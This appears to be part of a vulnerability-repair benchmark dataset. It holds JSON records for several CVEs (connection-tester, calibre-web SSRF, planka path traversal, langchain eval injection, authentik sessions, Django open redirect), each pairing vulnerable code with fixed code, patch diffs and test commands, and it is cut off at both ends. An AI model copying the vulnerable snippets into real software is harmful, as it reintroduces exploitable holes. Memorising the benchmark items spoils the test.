"end_line": 95, "snippet": " test: function ConnectionTester(host, port, callbackOrConnectTimeout, callback) {\n\n // for backward compatibility\n if (typeof callbackOrConnectTimeout === 'function') {\n console.log('deprecated: Please migrate to the new interface ConnectionTester\\(host, port, timeout, callback\\)');\n return testAsync(host, port, SOCKET_TIMEOUT, callbackOrConnectTimeout);\n }\n if (typeof callbackOrConnectTimeout === 'number') {\n if (callback) {\n return testAsync(host, port, callbackOrConnectTimeout, callback);\n } else {\n return testSync(host, port, callbackOrConnectTimeout);\n }\n }\n if (callbackOrConnectTimeout === undefined) {\n return testSync(host, port, SOCKET_TIMEOUT);\n }\n }"}], "fix_func": [{"id": "fix_js_28_1", "commit": "c1dc374138e1a9d3361c4b8e1ddb1a81d4b45bee", "file_path": "index.js", "start_line": 85, "end_line": 128, "snippet": " test: function ConnectionTester(host, port, connectTimeout, callback) {\n\n // validate host\n if (!isValidHostNameOrIP(host)) {\n console.error('[connection-tester] invalid host: ', host);\n host = undefined;\n }\n // validate port\n var originalPort = port;\n port = +port;\n if (!port || port < 0 || port > 65535) {\n console.error('[connection-tester] invalid port: ', originalPort);\n port = undefined;\n }\n\n if (typeof connectTimeout === 'function') {\n console.error('deprecated: Please migrate to the new interface ConnectionTester\\(host, port, timeout, callback\\)');\n callback = connectTimeout;\n connectTimeout = SOCKET_TIMEOUT;\n }\n if (connectTimeout === undefined) {\n connectTimeout = SOCKET_TIMEOUT;\n }\n\n if (typeof connectTimeout === 'number') {\n if (!port || !host) {\n var output = {\n success: false,\n error: 'invalid host/port'\n };\n\n if (callback) {\n return callback(null, output);\n } else {\n return output;\n }\n }\n if (callback) {\n return testAsync(host, port, connectTimeout, callback);\n } else {\n return testSync(host, port, connectTimeout);\n }\n }\n }"}, {"id": "fix_js_28_2", "commit": 
"c1dc374138e1a9d3361c4b8e1ddb1a81d4b45bee", "file_path": "index.js", "start_line": 10, "end_line": 15, "snippet": "//source - http://stackoverflow.com/questions/106179/regular-expression-to-match-dns-hostname-or-ip-address\nvar ValidHostnameRegex = new RegExp(\"^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]*[a-zA-Z0-9])\\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\\-]*[A-Za-z0-9])$\");\n\nfunction isValidHostNameOrIP(host) {\n return net.isIP(host) || ValidHostnameRegex.test(host);\n}"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,18 +1,44 @@\n- test: function ConnectionTester(host, port, callbackOrConnectTimeout, callback) {\n+ test: function ConnectionTester(host, port, connectTimeout, callback) {\n \n- // for backward compatibility\n- if (typeof callbackOrConnectTimeout === 'function') {\n- console.log('deprecated: Please migrate to the new interface ConnectionTester\\(host, port, timeout, callback\\)');\n- return testAsync(host, port, SOCKET_TIMEOUT, callbackOrConnectTimeout);\n+ // validate host\n+ if (!isValidHostNameOrIP(host)) {\n+ console.error('[connection-tester] invalid host: ', host);\n+ host = undefined;\n }\n- if (typeof callbackOrConnectTimeout === 'number') {\n+ // validate port\n+ var originalPort = port;\n+ port = +port;\n+ if (!port || port < 0 || port > 65535) {\n+ console.error('[connection-tester] invalid port: ', originalPort);\n+ port = undefined;\n+ }\n+\n+ if (typeof connectTimeout === 'function') {\n+ console.error('deprecated: Please migrate to the new interface ConnectionTester\\(host, port, timeout, callback\\)');\n+ callback = connectTimeout;\n+ connectTimeout = SOCKET_TIMEOUT;\n+ }\n+ if (connectTimeout === undefined) {\n+ connectTimeout = SOCKET_TIMEOUT;\n+ }\n+\n+ if (typeof connectTimeout === 'number') {\n+ if (!port || !host) {\n+ var output = {\n+ success: false,\n+ error: 'invalid host/port'\n+ };\n+\n+ if (callback) {\n+ return callback(null, output);\n+ } else {\n+ return output;\n+ }\n+ }\n if (callback) {\n- return testAsync(host, port, callbackOrConnectTimeout, callback);\n+ return testAsync(host, port, connectTimeout, callback);\n } else {\n- return testSync(host, port, callbackOrConnectTimeout);\n+ return testSync(host, port, connectTimeout);\n }\n }\n- if (callbackOrConnectTimeout === undefined) {\n- return testSync(host, port, SOCKET_TIMEOUT);\n- }\n }\n\n--- /dev/null\n+++ b/index.js\n@@ -0,0 +1,6 @@\n+//source - http://stackoverflow.com/questions/106179/regular-expression-to-match-dns-hostname-or-ip-address\n+var ValidHostnameRegex = new RegExp(\"^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]*[a-zA-Z0-9])\\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\\-]*[A-Za-z0-9])$\");\n+\n+function isValidHostNameOrIP(host) {\n+ return net.isIP(host) || ValidHostnameRegex.test(host);\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-7781:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/node-connection-tester\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-7781:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/node-connection-tester\ngit apply --whitespace=nowarn /workspace/fix.patch\nnpx mocha --grep \"should connect to localhost|should return false while connecting to 5678 port on www.example.com|should connect to localhost|should connect to www.yahoo.com 80|should return false while connecting to dead port on localhost\""} {"cve_id": "CVE-2022-0766", "cve_description": "Server-Side Request 
Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.17.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/janeczku/calibre-web", "patch_url": ["https://github.com/janeczku/calibre-web/commit/965352c8d96c9eae7a6867ff76b0db137d04b0b8"], "programing_language": "Python", "vul_func": [{"id": "vul_py_214_1", "commit": "8007e45", "file_path": "cps/helper.py", "start_line": 732, "end_line": 751, "snippet": "def save_cover_from_url(url, book_path):\n try:\n if not cli.allow_localhost:\n # 127.0.x.x, localhost, [::1], [::ffff:7f00:1]\n ip = socket.getaddrinfo(urlparse(url).hostname, 0)[0][4][0]\n if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\":\n log.error(\"Localhost was accessed for cover upload\")\n return False, _(\"You are not allowed to access localhost for cover uploads\")\n img = requests.get(url, timeout=(10, 200)) # ToDo: Error Handling\n img.raise_for_status()\n return save_cover(img, book_path)\n except (socket.gaierror,\n requests.exceptions.HTTPError,\n requests.exceptions.ConnectionError,\n requests.exceptions.Timeout) as ex:\n log.info(u'Cover Download Error %s', ex)\n return False, _(\"Error Downloading Cover\")\n except MissingDelegateError as ex:\n log.info(u'File Format Error %s', ex)\n return False, _(\"Cover Format Error\")"}], "fix_func": [{"id": "fix_py_214_1", "commit": "965352c", "file_path": "cps/helper.py", "start_line": 732, "end_line": 751, "snippet": "def save_cover_from_url(url, book_path):\n try:\n if not cli.allow_localhost:\n # 127.0.x.x, localhost, [::1], [::ffff:7f00:1]\n ip = socket.getaddrinfo(urlparse(url).hostname, 0)[0][4][0]\n if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\" or ip == \"0.0.0.0\" or ip == \"::\":\n log.error(\"Localhost was accessed for cover upload\")\n return False, _(\"You are not allowed to access localhost for cover uploads\")\n img = requests.get(url, timeout=(10, 200), allow_redirects=False) # ToDo: Error Handling\n img.raise_for_status()\n return save_cover(img, book_path)\n except (socket.gaierror,\n requests.exceptions.HTTPError,\n requests.exceptions.ConnectionError,\n requests.exceptions.Timeout) as ex:\n log.info(u'Cover Download Error %s', ex)\n return False, _(\"Error Downloading Cover\")\n except MissingDelegateError as ex:\n log.info(u'File Format Error %s', ex)\n return False, _(\"Cover Format Error\")"}], "vul_patch": "--- a/cps/helper.py\n+++ b/cps/helper.py\n@@ -3,10 +3,10 @@\n if not cli.allow_localhost:\n # 127.0.x.x, localhost, [::1], [::ffff:7f00:1]\n ip = socket.getaddrinfo(urlparse(url).hostname, 0)[0][4][0]\n- if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\":\n+ if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\" or ip == \"0.0.0.0\" or ip == \"::\":\n log.error(\"Localhost was accessed for cover upload\")\n return False, _(\"You are not allowed to access localhost for cover uploads\")\n- img = requests.get(url, timeout=(10, 200)) # ToDo: Error Handling\n+ img = requests.get(url, timeout=(10, 200), allow_redirects=False) # ToDo: Error Handling\n img.raise_for_status()\n return save_cover(img, book_path)\n except (socket.gaierror,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-2653", "cve_description": 
"With this vulnerability an attacker can read many sensitive files like configuration files, or the /proc/self/environ file, that contains the environment variable used by the web server that includes database credentials. If the web server user is root, an attacker will be able to read any file in the system.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/plankanban/planka", "patch_url": ["https://github.com/plankanban/planka/commit/ac1df5201dfdaf68d37f7e1b272bc137870d7418"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_249_1", "commit": "fbe24c0", "file_path": "server/api/controllers/attachments/download-thumbnail.js", "start_line": 10, "end_line": 21, "snippet": "module.exports = {\n inputs: {\n id: {\n type: 'string',\n regex: /^[0-9]+$/,\n required: true,\n },\n filename: {\n type: 'string',\n required: true,\n },\n },"}, {"id": "vul_js_249_2", "commit": "fbe24c0", "file_path": "server/api/controllers/attachments/download-thumbnail.js", "start_line": 29, "end_line": 69, "snippet": " async fn(inputs, exits) {\n const { currentUser } = this.req;\n\n const { attachment, card, project } = await sails.helpers.attachments\n .getProjectPath(inputs.id)\n .intercept('pathNotFound', () => Errors.ATTACHMENT_NOT_FOUND);\n\n const isBoardMember = await sails.helpers.users.isBoardMember(currentUser.id, card.boardId);\n\n if (!isBoardMember) {\n const isProjectManager = await sails.helpers.users.isProjectManager(\n currentUser.id,\n project.id,\n );\n\n if (!isProjectManager) {\n throw Errors.ATTACHMENT_NOT_FOUND; // Forbidden\n }\n }\n\n if (!attachment.image) {\n throw Errors.ATTACHMENT_NOT_FOUND;\n }\n\n const filePath = path.join(\n sails.config.custom.attachmentsPath,\n attachment.dirname,\n 'thumbnails',\n inputs.filename,\n );\n\n if (!fs.existsSync(filePath)) {\n throw Errors.ATTACHMENT_NOT_FOUND;\n }\n\n this.res.type(attachment.filename);\n this.res.set('Cache-Control', 'private, max-age=900'); // TODO: move to config\n\n return exits.success(fs.createReadStream(filePath));\n },\n};"}, {"id": "vul_js_249_3", "commit": "fbe24c0", "file_path": "server/config/routes.js", "start_line": 83, "end_line": 86, "snippet": " 'GET /attachments/:id/download/thumbnails/:filename': {\n action: 'attachments/download-thumbnail',\n skipAssets: false,\n },"}], "fix_func": [{"id": "fix_js_249_1", "commit": "ac1df5201dfdaf68d37f7e1b272bc137870d7418", "file_path": "server/api/controllers/attachments/download-thumbnail.js", "start_line": 10, "end_line": 17, "snippet": "module.exports = {\n inputs: {\n id: {\n type: 'string',\n regex: /^[0-9]+$/,\n required: true,\n },\n },"}, {"id": "fix_js_249_2", "commit": "ac1df5201dfdaf68d37f7e1b272bc137870d7418", "file_path": "server/api/controllers/attachments/download-thumbnail.js", "start_line": 25, "end_line": 65, "snippet": " async fn(inputs, exits) {\n const { currentUser } = this.req;\n\n const { attachment, card, project } = await sails.helpers.attachments\n .getProjectPath(inputs.id)\n .intercept('pathNotFound', () => Errors.ATTACHMENT_NOT_FOUND);\n\n const isBoardMember = await 
sails.helpers.users.isBoardMember(currentUser.id, card.boardId);\n\n if (!isBoardMember) {\n const isProjectManager = await sails.helpers.users.isProjectManager(\n currentUser.id,\n project.id,\n );\n\n if (!isProjectManager) {\n throw Errors.ATTACHMENT_NOT_FOUND; // Forbidden\n }\n }\n\n if (!attachment.image) {\n throw Errors.ATTACHMENT_NOT_FOUND;\n }\n\n const filePath = path.join(\n sails.config.custom.attachmentsPath,\n attachment.dirname,\n 'thumbnails',\n 'cover-256.jpg',\n );\n\n if (!fs.existsSync(filePath)) {\n throw Errors.ATTACHMENT_NOT_FOUND;\n }\n\n this.res.type('image/jpeg');\n this.res.set('Cache-Control', 'private, max-age=900'); // TODO: move to config\n\n return exits.success(fs.createReadStream(filePath));\n },\n};"}, {"id": "fix_js_249_3", "commit": "ac1df5201dfdaf68d37f7e1b272bc137870d7418", "file_path": "server/config/routes.js", "start_line": 83, "end_line": 86, "snippet": " 'GET /attachments/:id/download/thumbnails/cover-256.jpg': {\n action: 'attachments/download-thumbnail',\n skipAssets: false,\n },"}], "vul_patch": "--- a/server/api/controllers/attachments/download-thumbnail.js\n+++ b/server/api/controllers/attachments/download-thumbnail.js\n@@ -5,8 +5,4 @@\n regex: /^[0-9]+$/,\n required: true,\n },\n- filename: {\n- type: 'string',\n- required: true,\n- },\n },\n\n--- a/server/api/controllers/attachments/download-thumbnail.js\n+++ b/server/api/controllers/attachments/download-thumbnail.js\n@@ -26,14 +26,14 @@\n sails.config.custom.attachmentsPath,\n attachment.dirname,\n 'thumbnails',\n- inputs.filename,\n+ 'cover-256.jpg',\n );\n \n if (!fs.existsSync(filePath)) {\n throw Errors.ATTACHMENT_NOT_FOUND;\n }\n \n- this.res.type(attachment.filename);\n+ this.res.type('image/jpeg');\n this.res.set('Cache-Control', 'private, max-age=900'); // TODO: move to config\n \n return exits.success(fs.createReadStream(filePath));\n\n--- a/server/config/routes.js\n+++ b/server/config/routes.js\n@@ -1,4 +1,4 @@\n- 'GET /attachments/:id/download/thumbnails/:filename': {\n+ 'GET /attachments/:id/download/thumbnails/cover-256.jpg': {\n action: 'attachments/download-thumbnail',\n skipAssets: false,\n },\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-21513", "cve_description": "Versions of the package langchain-experimental from 0.0.15 and before 0.0.21 are vulnerable to Arbitrary Code Execution when retrieving values from the database, the code will attempt to call 'eval' on all values. An attacker can exploit this vulnerability and execute arbitrary python code if they can control the input prompt and the server is configured with VectorSQLDatabaseChain.\r\r**Notes:**\r\rImpact on the Confidentiality, Integrity and Availability of the vulnerable component:\r\rConfidentiality: Code execution happens within the impacted component, in this case langchain-experimental, so all resources are necessarily accessible.\r\rIntegrity: There is nothing protected by the impacted component inherently. Although anything returned from the component counts as 'information' for which the trustworthiness can be compromised.\r\rAvailability: The loss of availability isn't caused by the attack itself, but it happens as a result during the attacker's post-exploitation steps.\r\r\rImpact on the Confidentiality, Integrity and Availability of the subsequent system:\r\rAs a legitimate low-privileged user of the package (PR:L) the attacker does not have more access to data owned by the package as a result of this vulnerability than they did with normal usage (e.g. can query the DB). 
The unintended action that one can perform by breaking out of the app environment and exfiltrating files, making remote connections etc. happens during the post exploitation phase in the subsequent system - in this case, the OS.\r\rAT:P: An attacker needs to be able to influence the input prompt, whilst the server is configured with the VectorSQLDatabaseChain plugin.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/langchain-ai/langchain", "patch_url": ["https://github.com/langchain-ai/langchain/commit/7b13292e3544b2f5f2bfb8a27a062ea2b0c34561"], "programing_language": "Python", "vul_func": [{"id": "vul_py_223_1", "commit": "b809c24", "file_path": "libs/experimental/langchain_experimental/sql/vector_sql.py", "start_line": 86, "end_line": 95, "snippet": "def get_result_from_sqldb(\n db: SQLDatabase, cmd: str\n) -> Union[str, List[Dict[str, Any]], Dict[str, Any]]:\n result = db._execute(cmd, fetch=\"all\") # type: ignore\n if isinstance(result, list):\n return [{k: _try_eval(v) for k, v in dict(d._asdict()).items()} for d in result]\n else:\n return {\n k: _try_eval(v) for k, v in dict(result._asdict()).items() # type: ignore\n }"}], "fix_func": [{"id": "fix_py_223_1", "commit": "7b13292", "file_path": "libs/experimental/langchain_experimental/sql/vector_sql.py", "start_line": 79, "end_line": 83, "snippet": "def get_result_from_sqldb(\n db: SQLDatabase, cmd: str\n) -> Union[str, List[Dict[str, Any]], Dict[str, Any]]:\n result = db._execute(cmd, fetch=\"all\") # type: ignore\n return result"}], "vul_patch": "--- a/libs/experimental/langchain_experimental/sql/vector_sql.py\n+++ b/libs/experimental/langchain_experimental/sql/vector_sql.py\n@@ -2,9 +2,4 @@\n db: SQLDatabase, cmd: str\n ) -> Union[str, List[Dict[str, Any]], Dict[str, Any]]:\n result = db._execute(cmd, fetch=\"all\") # type: ignore\n- if isinstance(result, list):\n- return [{k: _try_eval(v) for k, v in dict(d._asdict()).items()} for d in result]\n- else:\n- return {\n- k: _try_eval(v) for k, v in dict(result._asdict()).items() # type: ignore\n- }\n+ return result\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-29928", "cve_description": "authentik is an open-source identity provider. 
Prior to versions 2024.12.4 and 2025.2.3, when authentik was configured to use the database for session storage (which is a non-default setting), deleting sessions via the Web Interface or the API would not revoke the session and the session holder would continue to have access to authentik. authentik 2025.2.3 and 2024.12.4 fix this issue. Switching to the cache-based session storage until the authentik instance can be upgraded is recommended. This will however also delete all existing sessions and users will have to re-authenticate.", "cwe_info": {"CWE-384": {"name": "Session Fixation", "description": "Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions."}}, "repo": "https://github.com/goauthentik/authentik", "patch_url": ["https://github.com/goauthentik/authentik/commit/71294b7deb6eb5726a782de83b957eaf25fc4cf6"], "programing_language": "Python", "vul_func": [{"id": "vul_js_202_1", "commit": "5af907d", "file_path": "authentik/core/api/users.py", "start_line": 771, "end_line": 780, "snippet": "    def partial_update(self, request: Request, *args, **kwargs) -> Response:\n        response = super().partial_update(request, *args, **kwargs)\n        instance: User = self.get_object()\n        if not instance.is_active:\n            sessions = AuthenticatedSession.objects.filter(user=instance)\n            session_ids = sessions.values_list(\"session_key\", flat=True)\n            cache.delete_many(f\"{KEY_PREFIX}{session}\" for session in session_ids)\n            sessions.delete()\n            LOGGER.debug(\"Deleted user's sessions\", user=instance.username)\n        return response"}, {"id": "vul_js_202_2", "commit": "5af907d", "file_path": "authentik/core/signals.py", "start_line": 61, "end_line": 64, "snippet": "def authenticated_session_delete(sender: type[Model], instance: \"AuthenticatedSession\", **_):\n    \"\"\"Delete session when authenticated session is deleted\"\"\"\n    cache_key = f\"{KEY_PREFIX}{instance.session_key}\"\n    cache.delete(cache_key)"}], "fix_func": [{"id": "fix_js_202_1", "commit": "71294b7", "file_path": "authentik/core/api/users.py", "start_line": 773, "end_line": 783, "snippet": "    def partial_update(self, request: Request, *args, **kwargs) -> Response:\n        response = super().partial_update(request, *args, **kwargs)\n        instance: User = self.get_object()\n        if not instance.is_active:\n            sessions = AuthenticatedSession.objects.filter(user=instance)\n            session_ids = sessions.values_list(\"session_key\", flat=True)\n            for session in session_ids:\n                SessionStore(session).delete()\n            sessions.delete()\n            LOGGER.debug(\"Deleted user's sessions\", user=instance.username)\n        return response"}, {"id": "fix_js_202_2", "commit": "71294b7", "file_path": "authentik/core/signals.py", "start_line": 65, "end_line": 67, "snippet": "def authenticated_session_delete(sender: type[Model], instance: \"AuthenticatedSession\", **_):\n    \"\"\"Delete session when authenticated session is deleted\"\"\"\n    SessionStore(instance.session_key).delete()"}], "vul_patch": "--- a/authentik/core/api/users.py\n+++ b/authentik/core/api/users.py\n@@ -4,7 +4,8 @@\n         if not instance.is_active:\n             sessions = AuthenticatedSession.objects.filter(user=instance)\n             session_ids = sessions.values_list(\"session_key\", flat=True)\n-            cache.delete_many(f\"{KEY_PREFIX}{session}\" for session in session_ids)\n+            for session in session_ids:\n+                SessionStore(session).delete()\n            sessions.delete()\n            LOGGER.debug(\"Deleted user's sessions\", user=instance.username)\n            return response\n\n--- 
a/authentik/core/signals.py\n+++ b/authentik/core/signals.py\n@@ -1,4 +1,3 @@\n def authenticated_session_delete(sender: type[Model], instance: \"AuthenticatedSession\", **_):\n \"\"\"Delete session when authenticated session is deleted\"\"\"\n- cache_key = f\"{KEY_PREFIX}{instance.session_key}\"\n- cache.delete(cache_key)\n+ SessionStore(instance.session_key).delete()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-14574", "cve_description": "django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/d6eaee092709aad477a9894598496c6deec532ff", "https://github.com/django/django/commit/c4e5ff7fdb5fce447675e90291fd33fddd052b3c", "https://github.com/django/django/commit/6fffc3c6d420e44f4029d5643f38d00a39b08525"], "programing_language": "Python", "vul_func": [{"id": "vul_py_10_1", "commit": "af344691114e4a68334c30543bfb838996328212", "file_path": "django/middleware/common.py", "start_line": 83, "end_line": 102, "snippet": " def get_full_path_with_slash(self, request):\n \"\"\"\n Return the full path of the request with a trailing slash appended.\n\n Raise a RuntimeError if settings.DEBUG is True and request.method is\n POST, PUT, or PATCH.\n \"\"\"\n new_path = request.get_full_path(force_append_slash=True)\n if settings.DEBUG and request.method in ('POST', 'PUT', 'PATCH'):\n raise RuntimeError(\n \"You called this URL via %(method)s, but the URL doesn't end \"\n \"in a slash and you have APPEND_SLASH set. Django can't \"\n \"redirect to the slash URL while maintaining %(method)s data. \"\n \"Change your form to point to %(url)s (note the trailing \"\n \"slash), or set APPEND_SLASH=False in your Django settings.\" % {\n 'method': request.method,\n 'url': request.get_host() + new_path,\n }\n )\n return new_path"}, {"id": "vul_py_10_2", "commit": "af344691114e4a68334c30543bfb838996328212", "file_path": "django/urls/resolvers.py", "start_line": 564, "end_line": 636, "snippet": " def _reverse_with_prefix(self, lookup_view, _prefix, *args, **kwargs):\n if args and kwargs:\n raise ValueError(\"Don't mix *args and **kwargs in call to reverse()!\")\n\n if not self._populated:\n self._populate()\n\n possibilities = self.reverse_dict.getlist(lookup_view)\n\n for possibility, pattern, defaults, converters in possibilities:\n for result, params in possibility:\n if args:\n if len(args) != len(params):\n continue\n candidate_subs = dict(zip(params, args))\n else:\n if set(kwargs).symmetric_difference(params).difference(defaults):\n continue\n matches = True\n for k, v in defaults.items():\n if kwargs.get(k, v) != v:\n matches = False\n break\n if not matches:\n continue\n candidate_subs = kwargs\n # Convert the candidate subs to text using Converter.to_url().\n text_candidate_subs = {}\n for k, v in candidate_subs.items():\n if k in converters:\n text_candidate_subs[k] = converters[k].to_url(v)\n else:\n text_candidate_subs[k] = str(v)\n # WSGI provides decoded URLs, without %xx escapes, and the URL\n # resolver operates on such URLs. 
First substitute arguments\n # without quoting to build a decoded URL and look for a match.\n # Then, if we have a match, redo the substitution with quoted\n # arguments in order to return a properly encoded URL.\n candidate_pat = _prefix.replace('%', '%%') + result\n if re.search('^%s%s' % (re.escape(_prefix), pattern), candidate_pat % text_candidate_subs):\n # safe characters from `pchar` definition of RFC 3986\n url = quote(candidate_pat % text_candidate_subs, safe=RFC3986_SUBDELIMS + '/~:@')\n # Don't allow construction of scheme relative urls.\n if url.startswith('//'):\n url = '/%%2F%s' % url[2:]\n return url\n # lookup_view can be URL name or callable, but callables are not\n # friendly in error messages.\n m = getattr(lookup_view, '__module__', None)\n n = getattr(lookup_view, '__name__', None)\n if m is not None and n is not None:\n lookup_view_s = \"%s.%s\" % (m, n)\n else:\n lookup_view_s = lookup_view\n\n patterns = [pattern for (_, pattern, _, _) in possibilities]\n if patterns:\n if args:\n arg_msg = \"arguments '%s'\" % (args,)\n elif kwargs:\n arg_msg = \"keyword arguments '%s'\" % (kwargs,)\n else:\n arg_msg = \"no arguments\"\n msg = (\n \"Reverse for '%s' with %s not found. %d pattern(s) tried: %s\" %\n (lookup_view_s, arg_msg, len(patterns), patterns)\n )\n else:\n msg = (\n \"Reverse for '%(view)s' not found. '%(view)s' is not \"\n \"a valid view function or pattern name.\" % {'view': lookup_view_s}\n )\n raise NoReverseMatch(msg)"}], "fix_func": [{"id": "fix_py_10_1", "commit": "6fffc3c6d420e44f4029d5643f38d00a39b08525", "file_path": "django/middleware/common.py", "start_line": 84, "end_line": 105, "snippet": " def get_full_path_with_slash(self, request):\n \"\"\"\n Return the full path of the request with a trailing slash appended.\n\n Raise a RuntimeError if settings.DEBUG is True and request.method is\n POST, PUT, or PATCH.\n \"\"\"\n new_path = request.get_full_path(force_append_slash=True)\n # Prevent construction of scheme relative urls.\n new_path = escape_leading_slashes(new_path)\n if settings.DEBUG and request.method in ('POST', 'PUT', 'PATCH'):\n raise RuntimeError(\n \"You called this URL via %(method)s, but the URL doesn't end \"\n \"in a slash and you have APPEND_SLASH set. Django can't \"\n \"redirect to the slash URL while maintaining %(method)s data. 
\"\n \"Change your form to point to %(url)s (note the trailing \"\n \"slash), or set APPEND_SLASH=False in your Django settings.\" % {\n 'method': request.method,\n 'url': request.get_host() + new_path,\n }\n )\n return new_path"}, {"id": "fix_py_10_2", "commit": "6fffc3c6d420e44f4029d5643f38d00a39b08525", "file_path": "django/urls/resolvers.py", "start_line": 564, "end_line": 634, "snippet": " def _reverse_with_prefix(self, lookup_view, _prefix, *args, **kwargs):\n if args and kwargs:\n raise ValueError(\"Don't mix *args and **kwargs in call to reverse()!\")\n\n if not self._populated:\n self._populate()\n\n possibilities = self.reverse_dict.getlist(lookup_view)\n\n for possibility, pattern, defaults, converters in possibilities:\n for result, params in possibility:\n if args:\n if len(args) != len(params):\n continue\n candidate_subs = dict(zip(params, args))\n else:\n if set(kwargs).symmetric_difference(params).difference(defaults):\n continue\n matches = True\n for k, v in defaults.items():\n if kwargs.get(k, v) != v:\n matches = False\n break\n if not matches:\n continue\n candidate_subs = kwargs\n # Convert the candidate subs to text using Converter.to_url().\n text_candidate_subs = {}\n for k, v in candidate_subs.items():\n if k in converters:\n text_candidate_subs[k] = converters[k].to_url(v)\n else:\n text_candidate_subs[k] = str(v)\n # WSGI provides decoded URLs, without %xx escapes, and the URL\n # resolver operates on such URLs. First substitute arguments\n # without quoting to build a decoded URL and look for a match.\n # Then, if we have a match, redo the substitution with quoted\n # arguments in order to return a properly encoded URL.\n candidate_pat = _prefix.replace('%', '%%') + result\n if re.search('^%s%s' % (re.escape(_prefix), pattern), candidate_pat % text_candidate_subs):\n # safe characters from `pchar` definition of RFC 3986\n url = quote(candidate_pat % text_candidate_subs, safe=RFC3986_SUBDELIMS + '/~:@')\n # Don't allow construction of scheme relative urls.\n return escape_leading_slashes(url)\n # lookup_view can be URL name or callable, but callables are not\n # friendly in error messages.\n m = getattr(lookup_view, '__module__', None)\n n = getattr(lookup_view, '__name__', None)\n if m is not None and n is not None:\n lookup_view_s = \"%s.%s\" % (m, n)\n else:\n lookup_view_s = lookup_view\n\n patterns = [pattern for (_, pattern, _, _) in possibilities]\n if patterns:\n if args:\n arg_msg = \"arguments '%s'\" % (args,)\n elif kwargs:\n arg_msg = \"keyword arguments '%s'\" % (kwargs,)\n else:\n arg_msg = \"no arguments\"\n msg = (\n \"Reverse for '%s' with %s not found. %d pattern(s) tried: %s\" %\n (lookup_view_s, arg_msg, len(patterns), patterns)\n )\n else:\n msg = (\n \"Reverse for '%(view)s' not found. 
'%(view)s' is not \"\n \"a valid view function or pattern name.\" % {'view': lookup_view_s}\n )\n raise NoReverseMatch(msg)"}], "vul_patch": "--- a/django/middleware/common.py\n+++ b/django/middleware/common.py\n@@ -6,6 +6,8 @@\n POST, PUT, or PATCH.\n \"\"\"\n new_path = request.get_full_path(force_append_slash=True)\n+ # Prevent construction of scheme relative urls.\n+ new_path = escape_leading_slashes(new_path)\n if settings.DEBUG and request.method in ('POST', 'PUT', 'PATCH'):\n raise RuntimeError(\n \"You called this URL via %(method)s, but the URL doesn't end \"\n\n--- a/django/urls/resolvers.py\n+++ b/django/urls/resolvers.py\n@@ -41,9 +41,7 @@\n # safe characters from `pchar` definition of RFC 3986\n url = quote(candidate_pat % text_candidate_subs, safe=RFC3986_SUBDELIMS + '/~:@')\n # Don't allow construction of scheme relative urls.\n- if url.startswith('//'):\n- url = '/%%2F%s' % url[2:]\n- return url\n+ return escape_leading_slashes(url)\n # lookup_view can be URL name or callable, but callables are not\n # friendly in error messages.\n m = getattr(lookup_view, '__module__', None)\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2018-14574:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2018-14574/bin/python ./runtests.py middleware.tests.CommonMiddlewareTest.test_append_slash_leading_slashes utils_tests.test_http.EscapeLeadingSlashesTests\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2018-14574:latest\n# bash /workspace/unit_test.sh\nset 